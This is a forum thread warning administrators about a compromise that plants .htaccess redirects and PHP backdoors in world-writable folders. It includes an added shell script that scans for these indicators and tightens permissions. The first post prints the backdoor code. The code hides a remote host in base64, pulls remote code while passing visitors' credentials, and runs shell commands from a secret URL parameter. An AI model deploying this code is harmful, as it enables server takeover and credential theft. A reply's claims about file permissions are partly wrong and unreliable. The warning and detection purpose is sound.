Security Exploit Heads Up...php/apache

iTec (Verified User; joined Mar 11, 2004; 30 messages; St. Albert, Alberta)
This does not just affect IPB. I have seen this also affecting other programs as well. The key thing I have noticed is that you only see the .htaccess files and the associated callback scripts in folders chmod 777. Files that are changed/edited are also chmod 777.

So this has affected photo gallery programs, upload folders on forums etc.

Each folder that is attacked will have a .htaccess file added

example of the .htaccess file

Options -MultiViews
ErrorDocument 404 //pics/albums/userpics/download.php


Another .htaccess file example

Options -MultiViews
ErrorDocument 404 //foldername/includes.php
Options -MultiViews
ErrorDocument 404 //foldername/messages.php

as well as any number of php files which the .htaccess file calls to. Some of the file names used include guest.php, config.php, configs.php, includes.php, include.php, report.php, date.php, time.php, among others.

Sample of callback code being found (slightly edited, < > removed):

?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}

Folders/files that are at least 755 do not seem to be touched. But if you find this on one site, check the whole server, as this seems to be a server-wide problem on afflicted servers.

Another thing: there will usually be parse errors reported on an affected server. This is an indication that the server has been compromised and files are being edited. In one case, the config_global.php file was edited and the MySQL info removed; in another case, the skin_global.php was edited and left basically blank.

So... basically ANY php script/folder that is chmod 777 is vulnerable, and it appears that the only way to prevent this is to have files/folders chmod to at least 755 (if not 644).

Another thing: all the aforementioned files will be owned by apache, not the site login.
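The post above gives three indicators (world-writable directories, .htaccess files whose ErrorDocument 404 points at a PHP script, and PHP files owned by the web server user) and one remediation (directories 755, files 644). The script below is an added example, not code from the thread or from IPB, that turns those indicators into a scan a server admin can run over a web root. It assumes a POSIX shell with find and grep, and that the web server runs as a user named apache (WEB_USER is an assumed, overridable variable); the sample tree it builds is constructed to mimic the .htaccess shown above.

```shell
#!/bin/sh
# Added example (not from the thread): scan a web root for the indicators
# described above. Assumptions: POSIX sh, find and grep on a Linux-style
# host, web server user "apache" (override with WEB_USER=... if different).

WEB_USER="${WEB_USER:-apache}"

# Indicator 1: directories that are world-writable (777 or any o+w), where
# the post reports the .htaccess and callback scripts being dropped.
find_world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null
}

# Indicator 2: .htaccess files whose ErrorDocument 404 hands a 404 to a PHP
# script, as in "ErrorDocument 404 //pics/albums/userpics/download.php".
find_suspicious_htaccess() {
    find "$1" -type f -name .htaccess \
        -exec grep -l -i 'ErrorDocument[[:space:]]*404[[:space:]].*\.php' {} + 2>/dev/null
}

# Indicator 3: PHP files owned by the web server user rather than the site
# login, i.e. written by the server process itself.
find_webuser_owned_php() {
    find "$1" -type f -name '*.php' -user "$WEB_USER" 2>/dev/null
}

# Remediation recommended in the thread: directories 755, files 644.
harden_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Build a constructed sample tree (one infected 777 gallery directory and one
# clean directory) and print its path, so the scan can be tried offline.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/pics/albums/userpics" "$dir/clean"
    chmod 755 "$dir/pics" "$dir/pics/albums" "$dir/clean"
    chmod 777 "$dir/pics/albums/userpics"
    printf 'Options -MultiViews\nErrorDocument 404 //pics/albums/userpics/download.php\n' \
        > "$dir/pics/albums/userpics/.htaccess"
    printf 'ErrorDocument 404 /404.html\n' > "$dir/clean/.htaccess"
    echo "$dir"
}

# Usage: sh scan.sh /var/www   (prints each indicator list; nothing is changed)
if [ -n "$1" ]; then
    echo "== world-writable directories";            find_world_writable_dirs "$1"
    echo "== .htaccess with ErrorDocument 404 -> .php"; find_suspicious_htaccess "$1"
    echo "== PHP files owned by $WEB_USER";          find_webuser_owned_php "$1"
fi
```

Run the scan first and review the hits before calling harden_permissions: some applications genuinely need a writable upload directory, and the thread's advice is to make those the exception rather than the default, not to break uploads blindly.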
 
iTec said:
This does not just affect IPB. I have seen this also affecting other programs as well.
Have you described this exploit anywhere? Certainly there's no description in this thread. What does this exploit do?
Another thing: there will usually be parse errors reported on an affected server. This is an indication that the server has been compromised and files are being edited. In one case, the config_global.php file was edited and the MySQL info removed; in another case, the skin_global.php was edited and left basically blank.
The above looks as if it may be a description of the exploit, but I still don't see a clear description. Can you make the exploit itself clearer?
the only way to prevent this, is to have files/folders chmod to at least 755 (if not 644)
Files can and should be chmod 644. If directories (Windows users call them folders) aren't chmod 755, then nothing can enter them. A file inside a subdirectory chmod 644 can't be modified, so it's quite safe. Unfortunately it can't be read either.

Jeff
 